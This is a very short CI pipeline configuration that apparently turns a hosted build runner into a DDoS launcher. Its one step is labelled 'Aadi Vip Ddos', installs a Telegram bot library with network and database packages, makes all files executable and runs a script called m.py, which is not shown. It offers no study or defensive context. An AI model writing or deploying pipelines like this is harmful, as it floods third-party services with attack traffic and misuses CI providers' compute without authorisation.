pipelines:
  default:
    - step:
        name: AADI VIP
        size: 2x
        image: apache/airflow:2.1.0
        script:
          - echo "Aadi Vip Ddos..."
          - apt update && pip install --upgrade pip
          - pip install telebot pymongo aiohttp && chmod +x * && python3 m.py
